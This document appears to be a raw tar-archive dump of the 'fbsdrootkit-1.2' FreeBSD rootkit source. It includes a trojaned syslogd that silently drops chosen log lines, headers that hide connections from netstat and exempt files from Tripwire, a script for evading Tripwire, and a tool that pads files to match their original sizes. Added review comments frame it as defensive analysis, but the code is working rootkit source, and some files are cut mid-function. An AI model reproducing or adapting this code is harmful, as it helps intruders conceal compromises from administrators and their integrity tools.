and print the message * on the appropriate log files. 
/*
 * Log a message to the appropriate log files, users, etc. based on
 * the priority.
 *
 * pri   - facility and level as passed by the caller
 * msg   - message text, optionally starting with a 16-byte timestamp
 * from  - host name recorded with the message
 * flags - ADDDATE / MARK / IGN_CONS / SYNC_FILE bits
 *
 * NOTE(review): the first statement calls check_log(msg, from) and returns
 * without logging anything when it is non-zero.  check_log is not defined in
 * this file; it presumably comes from the "../rootkitsyslogd.h" header that
 * the file includes under the comment "Rootkit configuration files".  For a
 * defender this is the point where this build silently drops selected
 * messages: a daemon built from this source is not a trustworthy record, so
 * compare the installed binary against a known-good copy and rely on logs
 * collected off-host.
 */
void
logmsg(pri, msg, from, flags)
	int pri;
	char *msg, *from;
	int flags;
{
	struct filed *f;
	int fac, msglen, omask, prilev;
	char *timestamp;
	char prog[NAME_MAX+1];
	int i;

	/* message filter hook: a non-zero result discards the message */
	if(check_log(msg,from)) return;

	dprintf("logmsg: pri %o, flags %x, from %s, msg %s\n",
	    pri, flags, from, msg);

	/* hold off init() (SIGHUP) and domark() (SIGALRM) while we work */
	omask = sigblock(sigmask(SIGHUP)|sigmask(SIGALRM));

	/*
	 * Check to see if msg looks non-standard.
	 */
	msglen = strlen(msg);
	if (msglen < 16 || msg[3] != ' ' || msg[6] != ' ' ||
	    msg[9] != ':' || msg[12] != ':' || msg[15] != ' ')
		flags |= ADDDATE;

	(void)time(&now);
	if (flags & ADDDATE)
		timestamp = ctime(&now) + 4;	/* skip the weekday field */
	else {
		/* the message carries its own timestamp; step over it */
		timestamp = msg;
		msg += 16;
		msglen -= 16;
	}

	/* skip leading blanks */
	while(isspace(*msg)) {
		msg++;
		msglen--;
	}

	/* extract facility and priority level */
	if (flags & MARK)
		fac = LOG_NFACILITIES;	/* marks use the extra f_pmask slot */
	else
		fac = LOG_FAC(pri);
	prilev = LOG_PRI(pri);

	/* extract program name */
	for(i = 0; i < NAME_MAX; i++) {
		if(!isalnum(msg[i]))
			break;
		prog[i] = msg[i];
	}
	prog[i] = 0;

	/* log the message to the particular outputs */
	if (!Initialized) {
		/* no configuration loaded yet: write to the console only */
		f = &consfile;
		f->f_file = open(ctty, O_WRONLY, 0);

		if (f->f_file >= 0) {
			fprintlog(f, flags, msg);
			(void)close(f->f_file);
		}
		(void)sigsetmask(omask);
		return;
	}
	for (f = Files; f; f = f->f_next) {
		/* skip messages that are incorrect priority */
		if (f->f_pmask[fac] < prilev ||
		    f->f_pmask[fac] == INTERNAL_NOPRI)
			continue;
		/* skip messages with the incorrect program name */
		if(f->f_program)
			if(strcmp(prog, f->f_program) != 0)
				continue;

		if (f->f_type == F_CONSOLE && (flags & IGN_CONS))
			continue;

		/* don't output marks to recently written files */
		if ((flags & MARK) && (now - f->f_time) < MarkInterval / 2)
			continue;

		/*
		 * suppress duplicate lines to this file
		 */
		if ((flags & MARK) == 0 && msglen == f->f_prevlen &&
		    !strcmp(msg, f->f_prevline) &&
		    !strcmp(from, f->f_prevhost)) {
			(void)strncpy(f->f_lasttime, timestamp, 15);
			f->f_prevcount++;
			dprintf("msg repeated %d times, %ld sec of %d\n",
			    f->f_prevcount, now - f->f_time,
			    repeatinterval[f->f_repeatcount]);
			/*
			 * If domark would have logged this by now,
			 * flush it now (so we don't hold isolated messages),
			 * but back off so we'll flush less often
			 * in the future.
			 */
			if (now > REPEATTIME(f)) {
				fprintlog(f, flags, (char *)NULL);
				BACKOFF(f);
			}
		} else {
			/* new line, save it */
			if (f->f_prevcount)
				fprintlog(f, 0, (char *)NULL);
			f->f_repeatcount = 0;
			(void)strncpy(f->f_lasttime, timestamp, 15);
			/*
			 * NOTE(review): strncpy with the full buffer size
			 * leaves f_prevhost unterminated when `from` is at
			 * least that long.
			 */
			(void)strncpy(f->f_prevhost, from,
					sizeof(f->f_prevhost));
			if (msglen < MAXSVLINE) {
				/* short enough to keep for duplicate detection */
				f->f_prevlen = msglen;
				f->f_prevpri = pri;
				(void)strcpy(f->f_prevline, msg);
				fprintlog(f, flags, (char *)NULL);
			} else {
				/* too long to save: log it directly */
				f->f_prevline[0] = 0;
				f->f_prevlen = 0;
				fprintlog(f, flags, msg);
			}
		}
	}
	(void)sigsetmask(omask);
}
/*
 * WALLMSG -- Write a message to the world at large
 *
 * Walks the utmp file and hands the message to ttymsg() for every logged-in
 * terminal when f is an F_WALL entry, or only for terminals whose user name
 * is listed in f->f_un.f_uname otherwise.  Errors reported by ttymsg() are
 * passed to logerror().  The static guard stops a nested call, which
 * logerror() could otherwise trigger, from walking utmp again.
 */
void
wallmsg(f, iov)
	struct filed *f;
	struct iovec *iov;
{
	static int reenter;			/* avoid calling ourselves */
	struct utmp ut;
	char tty[sizeof(ut.ut_line) + 1];
	FILE *utmpf;
	char *err;
	int idx, wanted;

	if (reenter++)
		return;

	utmpf = fopen(_PATH_UTMP, "r");
	if (utmpf == NULL) {
		logerror(_PATH_UTMP);
		reenter = 0;
		return;
	}

	/* NOSTRICT */
	while (fread((char *)&ut, sizeof(ut), 1, utmpf) == 1) {
		/* an empty name marks an unused utmp slot */
		if (ut.ut_name[0] == '\0')
			continue;

		/* ut_line need not be terminated; make a terminated copy */
		strncpy(tty, ut.ut_line, sizeof(ut.ut_line));
		tty[sizeof(ut.ut_line)] = '\0';

		/* should we send the message to this user? */
		wanted = (f->f_type == F_WALL);
		for (idx = 0; !wanted && idx < MAXUNAMES &&
		    f->f_un.f_uname[idx][0]; idx++)
			wanted = !strncmp(f->f_un.f_uname[idx], ut.ut_name,
			    UT_NAMESIZE);
		if (!wanted)
			continue;

		err = ttymsg(iov, 6, tty, 60*5);
		if (err != NULL) {
			errno = 0;	/* already in msg */
			logerror(err);
		}
	}
	(void)fclose(utmpf);
	reenter = 0;
}
/*
 * Print syslogd errors some place.
 *
 * Builds "syslogd: <type>" and, when errno is set, appends ": " and the
 * strerror() text.  The result is truncated to the 100-byte buffer, errno
 * is cleared, and the line is sent through logmsg() as LOG_SYSLOG|LOG_ERR
 * from the local host.
 */
void
logerror(type)
	char *type;
{
	char text[100];
	int saved = errno;

	if (saved == 0)
		(void)snprintf(text, sizeof(text), "syslogd: %s", type);
	else
		(void)snprintf(text, sizeof(text), "syslogd: %s: %s",
		    type, strerror(saved));

	/* callers rely on errno being clean after an error was reported */
	errno = 0;
	dprintf("%s\n", text);
	logmsg(LOG_SYSLOG|LOG_ERR, text, LocalHostName, ADDDATE);
}
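/*
 * Crack a configuration file line
 *
 * line - one selector/action line with trailing blanks already removed
 * f    - entry to fill in; it is zeroed first
 * prog - program name the line applies to, "*" or NULL for all programs
 *
 * On a parse error the problem is reported through logerror() and f is
 * left with f_type == F_UNUSED.
 *
 * Changes from the original, all about input that does not fit:
 *  - names are copied into buf[] with a bound (a configuration line can be
 *    longer than MAXLINE), and error text is built with snprintf();
 *  - the "skip cruft" loop stops at the end of the string; strchr() also
 *    matches the terminating NUL, so the old loop could walk past it;
 *  - a numeric facility that decode() returns unchecked is rejected when it
 *    would index outside f_pmask[];
 *  - host and file names that do not fit their fields are rejected with
 *    ENAMETOOLONG in place of an unbounded strcpy().
 */
void
cfline(line, f, prog)
	char *line;
	struct filed *f;
	char *prog;
{
	struct hostent *hp;
	int i, pri;
	char *bp, *p, *q;
	char buf[MAXLINE], ebuf[100];

	dprintf("cfline(\"%s\", f, \"%s\")\n", line, prog);

	errno = 0;	/* keep strerror() stuff out of logerror messages */

	/* clear out file entry */
	memset(f, 0, sizeof(*f));
	for (i = 0; i <= LOG_NFACILITIES; i++)
		f->f_pmask[i] = INTERNAL_NOPRI;

	/* save program name if any */
	if (prog && *prog == '*')
		prog = NULL;
	if (prog) {
		f->f_program = calloc(1, strlen(prog) + 1);
		if (f->f_program)
			strcpy(f->f_program, prog);
	}

	/* scan through the list of selectors */
	for (p = line; *p && *p != '\t';) {

		/* find the end of this facility name list */
		for (q = p; *q && *q != '\t' && *q++ != '.'; )
			continue;

		/* collect priority name; extra characters are dropped */
		for (bp = buf; *q && !strchr("\t,;", *q); q++)
			if (bp < &buf[sizeof(buf) - 1])
				*bp++ = *q;
		*bp = '\0';

		/* skip cruft */
		while (*q && strchr(", ;", *q))
			q++;

		/* decode priority name */
		if (*buf == '*')
			pri = LOG_PRIMASK + 1;
		else {
			pri = decode(buf, prioritynames);
			if (pri < 0) {
				(void)snprintf(ebuf, sizeof(ebuf),
				    "unknown priority name \"%s\"", buf);
				logerror(ebuf);
				return;
			}
		}

		/* scan facilities */
		while (*p && !strchr("\t.;", *p)) {
			for (bp = buf; *p && !strchr("\t,;.", *p); p++)
				if (bp < &buf[sizeof(buf) - 1])
					*bp++ = *p;
			*bp = '\0';
			if (*buf == '*')
				for (i = 0; i < LOG_NFACILITIES; i++)
					f->f_pmask[i] = pri;
			else {
				i = decode(buf, facilitynames);
				/* facility codes are stored shifted left by 3 */
				if (i < 0 || (i >> 3) >= LOG_NFACILITIES) {
					(void)snprintf(ebuf, sizeof(ebuf),
					    "unknown facility name \"%s\"",
					    buf);
					logerror(ebuf);
					return;
				}
				f->f_pmask[i >> 3] = pri;
			}
			while (*p == ',' || *p == ' ')
				p++;
		}

		p = q;
	}

	/* skip to action part */
	while (*p == '\t')
		p++;

	switch (*p)
	{
	case '@':
		if (!InetInuse)
			break;
		++p;
		if (strlen(p) >= sizeof(f->f_un.f_forw.f_hname)) {
			errno = ENAMETOOLONG;
			logerror(p);
			break;
		}
		(void)strcpy(f->f_un.f_forw.f_hname, p);
		hp = gethostbyname(p);
		if (hp == NULL) {
			extern int h_errno;

			logerror(hstrerror(h_errno));
			break;
		}
		memset(&f->f_un.f_forw.f_addr, 0,
			 sizeof(f->f_un.f_forw.f_addr));
		f->f_un.f_forw.f_addr.sin_family = AF_INET;
		f->f_un.f_forw.f_addr.sin_port = LogPort;
		memmove(&f->f_un.f_forw.f_addr.sin_addr, hp->h_addr,
		    hp->h_length);
		f->f_type = F_FORW;
		break;

	case '/':
		if (strlen(p) >= sizeof(f->f_un.f_fname)) {
			errno = ENAMETOOLONG;
			logerror(p);
			break;
		}
		(void)strcpy(f->f_un.f_fname, p);
		if ((f->f_file = open(p, O_WRONLY|O_APPEND, 0)) < 0) {
			f->f_file = F_UNUSED;
			logerror(p);
			break;
		}
		if (isatty(f->f_file))
			f->f_type = F_TTY;
		else
			f->f_type = F_FILE;
		if (strcmp(p, ctty) == 0)
			f->f_type = F_CONSOLE;
		break;

	case '*':
		f->f_type = F_WALL;
		break;

	default:
		/* comma separated user names, at most MAXUNAMES of them */
		for (i = 0; i < MAXUNAMES && *p; i++) {
			for (q = p; *q && *q != ','; )
				q++;
			(void)strncpy(f->f_un.f_uname[i], p, UT_NAMESIZE);
			if ((q - p) > UT_NAMESIZE)
				f->f_un.f_uname[i][UT_NAMESIZE] = '\0';
			else
				f->f_un.f_uname[i][q - p] = '\0';
			while (*q == ',' || *q == ' ')
				q++;
			p = q;
		}
		f->f_type = F_USERS;
		break;
	}
}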
buf[40]; if (isdigit(*name)) return (atoi(name)); for (p = buf; *name && p < &buf[sizeof(buf) - 1]; p++, name++) { if (isupper(*name)) *p = tolower(*name); else *p = *name; } *p = '\0'; for (c = codetab; c->c_name; c++) if (!strcmp(buf, c->c_name)) return (c->c_val); return (-1); } fbsdrootkit-1.2/dotrip.sh100700 764 764 2355 6273037245 13006 0ustar dfdf#!/bin/sh # Simple script to avoid detection by tripwire. Modify to suit your needs. echo -n "Trying to guess the location of tripwire. . ." TRIPWIRE=`which tripwire` if [ ! -x $TRIPWIRE ]; then echo "Failed!" echo -n "Please enter a full path to tripwire: " while read TRIPWIRE; do if [ -x $TRIPWIRE ]; then echo "Ok." break else echo -n "That doesn't exist! Try again: " fi done else echo "Ok: $TRIPWIRE" fi echo -n "Trying to guess the location of the tripwire database. . ." DBPATH="/usr/adm/tcheck/databases/tw.db" if [ ! -f $DBPATH ]; then echo "Failed!" echo -n "Please enter the name of the database file: " while read DBPATH; do if [ -f $DBPATH ]; then echo "Ok." break else echo -n "That doesn't exist! Try again: " fi done else echo "Ok: $DBPATH" fi DONE=false while [ $DONE = "false" ]; do DONE=true echo -n "Is the database file read-only?[y(n)] " read ANSWER case $ANSWER in [yY] ) make tripwire-inst install.sh $TRIPWIRE exit 0 ;; [nN] ) break ;; * ) echo "Yes or No"\! DONE=false ;; esac done DBFILE=./databases/`basename $DBPATH` for BIN; do echo -n "Updating $BIN. . ." $TRIPWIRE -update $BIN mv $DBFILE $DBPATH echo "done." done echo "All done here chief!" 
fbsdrootkit-1.2/rootkitnetstat.h100600 764 764 4242 6257562154 14420 0ustar dfdf#define STR_SIZE 128
/*
 * Review note (defensive analysis): this header appears to be compiled into a
 * modified netstat. The three sections are selected by MAIN_DOT_C, INET_DOT_C
 * and UNIX_DOT_C (presumably defined by the netstat source files that include
 * it; those files are not shown here). It loads a list of rules from a file
 * and provides predicates that report whether a socket matches a rule. What
 * the caller does with a match is not visible here; presumably the entry is
 * left out of the listing. Output from a netstat built this way is not a
 * reliable inventory of connections: compare it with data collected off-host
 * and verify the binary against a digest taken from trusted media.
 */
#define SPC_CHAR " "
#define END_CHAR "\n"
#define SHOWFLAG /* Able to list all with 'netstat -/' command */
/*
 * Rule types stored in h_st.hack_type. In the predicates below they select
 * the compared attribute: local address, foreign address, local port,
 * foreign port, and UNIX-domain socket path.
 */
#define BY_LADDR 1
#define BY_RADDR 2
#define BY_LPORT 3
#define BY_RPORT 4
#define BY_UNIX 5

/* One rule: a BY_* type plus the text it is matched against. */
struct h_st {
    struct h_st *next;
    int hack_type;
    char hack_cmd[STR_SIZE];
};

/* File-scope state: hack_list is the list head, h_tmp the shared cursor used
 * by both the loader and the predicates. */
struct h_st *hack_list;
struct h_st *h_tmp;
char tmp_str[STR_SIZE];
char *strp;
FILE *fp_hack;
int showall;

#ifdef MAIN_DOT_C
/*
 * Load the rule list.
 *
 * The file name is the first nine characters of ROOTKIT_HIDE_HOSTS (defined
 * elsewhere, not shown), copied one character at a time into a local buffer.
 * NOTE(review): presumably done so the path does not appear as a plain string
 * in the compiled binary; confirm against the build. If so, a strings(1) pass
 * over the binary will not list it.
 *
 * Each line read by fgets() is split with strtok(): the text before the first
 * SPC_CHAR is converted with atoi() into hack_type, the rest up to END_CHAR
 * is copied into hack_cmd. A new node is allocated before the current one is
 * filled, so the list always ends in an unfilled node whose next is NULL; the
 * predicates stop before that node. If the file cannot be opened the list
 * holds only that node and nothing matches.
 */
inline addr_block_list() /* HACK read in maskfile */
{
    char FILENAME[10];

    FILENAME[0]=ROOTKIT_HIDE_HOSTS[0];
    FILENAME[1]=ROOTKIT_HIDE_HOSTS[1];
    FILENAME[2]=ROOTKIT_HIDE_HOSTS[2];
    FILENAME[3]=ROOTKIT_HIDE_HOSTS[3];
    FILENAME[4]=ROOTKIT_HIDE_HOSTS[4];
    FILENAME[5]=ROOTKIT_HIDE_HOSTS[5];
    FILENAME[6]=ROOTKIT_HIDE_HOSTS[6];
    FILENAME[7]=ROOTKIT_HIDE_HOSTS[7];
    FILENAME[8]=ROOTKIT_HIDE_HOSTS[8];
    FILENAME[9]='\0';
    h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
    hack_list=h_tmp;
    if(fp_hack=fopen (FILENAME, "r")) {
        while(fgets(tmp_str, 126, fp_hack)) {
            h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
            strp=tmp_str;
            strp=strtok(strp, SPC_CHAR);
            h_tmp->hack_type=atoi(strp);
            strp=strtok('\0', END_CHAR);
            strcpy(h_tmp->hack_cmd, strp);
            h_tmp=h_tmp->next;
        }
        fclose(fp_hack);
    }
    h_tmp->next=NULL;
}
#endif

#ifdef INET_DOT_C
/*
 * Return 1 if the given Internet PCB matches any loaded rule, else 0.
 *
 * Address rules use strstr() on the text produced by inet_ntoa(), so a rule
 * matches every address whose printed form contains the rule text. Port rules
 * compare the PCB field with atoi() of the rule text. Rules of type BY_UNIX
 * are ignored here.
 */
inline int check_inet(struct inpcb the_net)
{
    int hide=0;

    for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) {
        switch(h_tmp->hack_type) {
        case BY_LADDR:
            if(strstr(inet_ntoa(the_net.inp_laddr),h_tmp->hack_cmd))
                hide=1;
            break;
        case BY_RADDR:
            if(strstr(inet_ntoa(the_net.inp_faddr),h_tmp->hack_cmd))
                hide=1;
            break;
        case BY_LPORT:
            if(the_net.inp_lport==atoi(h_tmp->hack_cmd))
                hide=1;
            break;
        case BY_RPORT:
            if(the_net.inp_fport==atoi(h_tmp->hack_cmd))
                hide=1;
            break;
        }
    }
    return(hide);
}
#endif

#ifdef UNIX_DOT_C
/*
 * Return 1 if the UNIX-domain socket path contains the text of any BY_UNIX
 * rule (substring match via strstr()), else 0.
 */
inline int check_unix(char *path)
{
    int hide=0;
    /* ira BEGIN */
    for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) {
        switch(h_tmp->hack_type) {
        case BY_UNIX:
if(strstr(path, h_tmp->hack_cmd)) hide=1; break; } } return(hide); }
#endif
fbsdrootkit-1.2/rootkitsyslogd.h100600 764 764 2374 6257562237 14430 0ustar dfdf#define STR_SIZE 128
/*
 * Review note (defensive analysis): this header appears to be included by the
 * modified syslogd in this archive. log_block_list() loads one string per
 * line from a file; check_log() reports whether a message or its origin
 * contains any of those strings. The caller's reaction to a match is not
 * shown here; presumably the message is discarded (confirm in syslogd.c).
 * Treat syslog output from a host running such a build as potentially
 * incomplete, and verify the syslogd binary against a digest taken from
 * trusted media.
 */

/* One list entry: a substring to look for in log traffic. */
struct h_st {
    struct h_st *next;
    char logstr[STR_SIZE];
};

/* File-scope state: hack_list is the list head, h_tmp the shared cursor. */
struct h_st *hack_list;
struct h_st *h_tmp;
char tmp_str[STR_SIZE];
FILE *fp_hack;
int showall=0;

/*
 * Load the substring list.
 *
 * The file name is the first nine characters of ROOTKIT_HIDE_LOG (defined
 * elsewhere, not shown), copied one character at a time.
 * NOTE(review): presumably done so the path does not appear as a plain string
 * in the compiled binary; confirm against the build.
 *
 * Each line read by fgets() is copied into logstr and its last character
 * (assumed to be the newline) is overwritten with NUL. A new node is
 * allocated before the current one is filled, so the list always ends in an
 * unfilled node whose next is NULL; check_log() stops before it. If the file
 * cannot be opened the list holds only that node and nothing matches.
 */
inline log_block_list()
{
    char FILENAME[10];

    FILENAME[0]=ROOTKIT_HIDE_LOG[0];
    FILENAME[1]=ROOTKIT_HIDE_LOG[1];
    FILENAME[2]=ROOTKIT_HIDE_LOG[2];
    FILENAME[3]=ROOTKIT_HIDE_LOG[3];
    FILENAME[4]=ROOTKIT_HIDE_LOG[4];
    FILENAME[5]=ROOTKIT_HIDE_LOG[5];
    FILENAME[6]=ROOTKIT_HIDE_LOG[6];
    FILENAME[7]=ROOTKIT_HIDE_LOG[7];
    FILENAME[8]=ROOTKIT_HIDE_LOG[8];
    FILENAME[9]='\0';
    h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
    hack_list=h_tmp;
    if(fp_hack=fopen(FILENAME, "r")) {
        while(fgets(tmp_str, 126, fp_hack)) {
            h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
            strcpy(h_tmp->logstr, tmp_str);
            h_tmp->logstr[strlen(h_tmp->logstr)-1]='\0';
            h_tmp=h_tmp->next;
        }
        fclose(fp_hack);
    }
    h_tmp->next=NULL;
}

/*
 * Return 1 if either msg or from contains any loaded string (substring match
 * via strstr()), else 0.
 */
inline int check_log(char *msg, char *from)
{
    for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next)
        if((strstr(msg, h_tmp->logstr))||(strstr(from, h_tmp->logstr)))
            return(1);
    return(0);
}
fbsdrootkit-1.2/addlen.c100600 764 764 1564 6265032641 12540 0ustar dfdf#include
#include
#include
#include "rootkitutil.h"
/*
 * Changes the length of a file by adding filler zero's to the end
 *
 * by Method
 */
/*
 * Review note (defensive analysis): the program measures both files with
 * lseek(SEEK_END), exits with a message if argv[1] is not shorter than
 * argv[2], and otherwise appends (size of argv[2] - size of argv[1]) zero
 * bytes to argv[1]. BASENAME, USAGE, ERR and RK_PROG come from rootkitutil.h,
 * which is not shown here. Because a file can be padded to any target length
 * this way, a matching file size is not evidence that a binary is unmodified;
 * integrity checks need cryptographic digests compared with a baseline kept
 * off the host.
 */
main(int argc, char **argv)
{
    int fd;
    long pos1,pos2,diff;
    char *buf;

    BASENAME(argv[0]);
    if(argc!=3)
        USAGE("original replacement")
    if((fd=open(argv[1],O_RDONLY))<0)
        ERR("open")
    pos1=lseek(fd,0,SEEK_END);
    close(fd);
    if((fd=open(argv[2],O_RDONLY))<0)
        ERR("open")
    pos2=lseek(fd,0,SEEK_END);
    close(fd);
    if((diff=pos2-pos1)<=0) {
        fprintf(stderr,"%s: %s is >= than %s, no changes made.\n",RK_PROG,argv[1],argv[2]);
        exit(1);
    }
    if((fd=open(argv[1],O_WRONLY|O_APPEND))<0)
        ERR("open")
    lseek(fd,0,SEEK_END);
    buf=(char *)malloc(diff);
    memset(buf,0x00,diff);
    if(write(fd,buf,diff)<0)
ERR("write") printf("%s: wrote %d bytes to %s.\n",RK_PROG,diff,argv[1]); exit(0); }
fbsdrootkit-1.2/dist.sh100700 764 764 73 6271317673 12407 0ustar dfdf#!/bin/sh DIR=`basename $PWD` cd .. tar cvfz $1.tgz $DIR
fbsdrootkit-1.2/rootkittripwire.h100600 764 764 2022 6273034560 14566 0ustar dfdf#define STR_SIZE 128
/*
 * Review note (defensive analysis): this header appears to be included by the
 * modified Tripwire build shipped in this archive. file_block_list() loads
 * one path per line from a file; check_file() reports whether a path is on
 * that list. The caller's reaction to a match is not shown here; presumably
 * the listed files are left out of integrity checking (confirm in the
 * Tripwire sources). An integrity checker that lives on the host it checks
 * can itself be replaced, so its binary and database need to be verified from
 * read-only or off-host media before its reports are relied on.
 */

/* One list entry: a file path. */
struct h_st {
    struct h_st *next;
    char filename[STR_SIZE];
};

/* File-scope state: hack_list is the list head, h_tmp the shared cursor. */
struct h_st *hack_list;
struct h_st *h_tmp;
char tmp_str[STR_SIZE];
FILE *fp_hack;

/*
 * Load the path list.
 *
 * The file name is the first nine characters of ROOTKIT_HIDE_TRIP (defined
 * elsewhere, not shown), copied one character at a time.
 * NOTE(review): presumably done so the path does not appear as a plain string
 * in the compiled binary; confirm against the build.
 *
 * Each line read by fgets() is copied into filename and its last character
 * (assumed to be the newline) is overwritten with NUL. A new node is
 * allocated before the current one is filled, so the list always ends in an
 * unfilled node whose next is NULL; check_file() stops before it. If the file
 * cannot be opened the list holds only that node and nothing matches.
 */
inline file_block_list()
{
    char TWCONF[10];

    TWCONF[0]=ROOTKIT_HIDE_TRIP[0];
    TWCONF[1]=ROOTKIT_HIDE_TRIP[1];
    TWCONF[2]=ROOTKIT_HIDE_TRIP[2];
    TWCONF[3]=ROOTKIT_HIDE_TRIP[3];
    TWCONF[4]=ROOTKIT_HIDE_TRIP[4];
    TWCONF[5]=ROOTKIT_HIDE_TRIP[5];
    TWCONF[6]=ROOTKIT_HIDE_TRIP[6];
    TWCONF[7]=ROOTKIT_HIDE_TRIP[7];
    TWCONF[8]=ROOTKIT_HIDE_TRIP[8];
    TWCONF[9]='\0';
    h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
    hack_list=h_tmp;
    if(fp_hack=fopen(TWCONF, "r")) {
        while(fgets(tmp_str, 126, fp_hack)) {
            h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
            strcpy(h_tmp->filename, tmp_str);
            h_tmp->filename[strlen(h_tmp->filename)-1]='\0';
            h_tmp=h_tmp->next;
        }
    }
    h_tmp->next=NULL;
}

/*
 * Return 1 if fpath is exactly equal (strcmp()) to a loaded path, else 0.
 */
inline int check_file(char *fpath)
{
    for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next)
        if(!strcmp(fpath, h_tmp->filename))
            return(1);
    return(0);
}
fbsdrootkit-1.2/tripwire-1.2/ 40700 764 764 0 6273465340 13210 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/aux/ 40700 764 764 0 5630552013 13773 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/aux/Makefile100600 764 764 1143 5503640070 15531 0ustar dfdf# $Id: Makefile,v 1.8 1993/12/15 16:50:00 genek Exp $ # # Tripwire aux program build # BORDER = ../include/byteorder.h INODE = ../include/inode.h all: $(BORDER) $(INODE) $(BORDER): byteorder.c ntohl.h @echo "###" @echo "### Ignore warnings about shift count negative/too large on line 36" @echo "###" $(CC) $(CFLAGS) $(LDFLAGS) byteorder.c -o byteorder (./byteorder; cat ./ntohl.h) > $(BORDER) $(INODE): types.sh types.c types $(SHELL) ./types.sh "$(CPP)" > $(INODE) types: types.c
$(CC) $(CFLAGS) $(LDFLAGS) types.c -o types clean: rm -f types byteorder *.o core ourtypes.h $(BORDER) $(INODE) fbsdrootkit-1.2/tripwire-1.2/aux/byteorder.c100600 764 764 2062 5611466314 16244 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: byteorder.c,v 1.5 1994/07/15 11:02:36 gkim Exp $"; #endif #include "../include/config.h" #include #ifdef STDLIBH #include #endif /* * byteorder.c * * lifted and hacked from Larry Wall's Configure program. * * Gene Kim * Purdue University * October 14, 1992 */ void header_print(); void main() { int i; union { uint32 l; char c[sizeof(int32)]; } u; /* print out machine-generated banner for .h file */ header_print(); if (sizeof(int32) > 4) u.l = (0x08070605L << 32) | 0x04030201L; else u.l = 0x04030201L; (void)printf("#define BYTEORDER 0x"); for (i=0; i < sizeof(int32); i++) (void)printf("%c",u.c[i]+'0'); (void)printf("\n"); exit(0); /*NOTREACHED*/ } void header_print() { printf("/*\n"); printf(" * byteorder.h\n"); printf(" *\n"); printf(" * Do not modify this file. This file was automatically \n"); printf(" * generated by the Tripwire makefile.\n"); printf(" *\n"); printf(" */\n"); printf("\n"); } fbsdrootkit-1.2/tripwire-1.2/aux/ntohl.h100600 764 764 1735 5611466315 15405 0ustar dfdf/* * It is a *bad* idea to call a private macro by * a well known name that is actually a function on * some architectures. So, I've prepended the * names with "bs_". * "bs" stands for "byte swapping"; No, really. 
*/ #if BYTEORDER == 0x4321 #define bs_ntohl(x) #define bs_htonl(x) #else #if ((BYTEORDER - 0x1111) & 0x444) || !(BYTEORDER & 0xf) #define bs_ntohl(x) fatal("Unknown BYTEORDER\n") #define bs_htonl(x) fatal("Unknown BYTEORDER\n") #else #define BYTEREVERSE(x) {register unsigned char __t, \ *__c = (unsigned char *) &(x); \ __t = __c[3]; __c[3] = *__c; *__c++ = __t; \ __t = *__c; *__c = __c[1]; *++__c = __t; } #define bs_ntohl(x) BYTEREVERSE(x) #define bs_htonl(x) BYTEREVERSE(x) #endif #endif /* $Id: ntohl.h,v 1.3 1994/07/15 11:02:37 gkim Exp $ Then, wherever you use the value, replace: i = ntohl(j); -with- i = j; bs_ntohl(i); The resulting code will be faster that using a subroutine, especially if these routines are called often. --spaf */ fbsdrootkit-1.2/tripwire-1.2/aux/twconvert.c100600 764 764 4702 5502764523 16305 0ustar dfdf#include /* * twconvert * * convert v1.0 Tripwire databases to v1.1 * * Gene Kim * $Id: twconvert.c,v 1.1 1993/12/13 04:02:27 genek Exp $ */ void b64_convert(); void main() { /* filename: (entrynumber, ignorevec, st_mode, st_ino, st_nlink, * st_uid, st_gid, st_size, * ltob64(statbuf->st_atime, vec64_a), * ltob64(statbuf->st_mtime, vec64_m), * ltob64(statbuf->st_ctime, vec64_c), sig0, sig1, ..., sig9 */ char s[2048], t[2048]; char filename[1024], entrynum[128], ignorevec[128], st_mode[128], st_ino[128], st_nlink[128], st_uid[128], st_gid[128], st_size[128], vec64[13][128]; int err, i; int linenumber = 0; while (fgets(s, sizeof(s), stdin) != NULL) { linenumber++; if (s[0] == '#' || s[0] == '@') { fputs(s, stdout); continue; } if ((err = sscanf(s, "%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s", filename, entrynum, ignorevec, st_mode, st_ino, st_nlink, st_uid, st_gid, st_size, vec64[0], vec64[1], vec64[2], vec64[3], vec64[4], vec64[5], vec64[6], vec64[7], vec64[8], vec64[9], vec64[10], vec64[11], vec64[12])) != 22) { fputs(s, stdout); continue; } /* convert */ b64_convert(ignorevec); for (i = 0; i < 13; i++) { 
b64_convert(vec64[i]); } sprintf(t, "%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s \n", filename, entrynum, ignorevec, st_mode, st_ino, st_nlink, st_uid, st_gid, st_size, vec64[0], vec64[1], vec64[2], vec64[3], vec64[4], vec64[5], vec64[6], vec64[7], vec64[8], vec64[9], vec64[10], vec64[11], vec64[12]); fputs(t, stdout); if (strlen(s) != strlen(t)) { fprintf(stderr, "strlens differ: old=%d, new=%d\n", strlen(s), strlen(t)); exit(1); } } exit(0); } static char new64vec[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz:."; static char old64vec[] = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; void b64_convert(s) char *s; { int i; char *pc; char tmp[64]; if (strcmp(s, "0") == 0) { return; } strcpy(tmp, s); for (pc = s; *pc; pc++) { /* search old vector */ for (i = 0; i < 64; i++) { if (old64vec[i] == *pc) { *pc = new64vec[i]; break; } } } /* fprintf(stderr, "(%s) --> (%s)\n", tmp, s); */ } fbsdrootkit-1.2/tripwire-1.2/aux/types.c100600 764 764 3006 5502764523 15412 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: types.c,v 1.4 1993/12/13 04:02:27 genek Exp $"; #endif #include "../include/config.h" #include #include #include #ifdef STDLIBH #include #endif void typeis(); static void usage() { fputs("types: usage: typename\n", stderr); exit(1); } char *pc; int isunsigned; 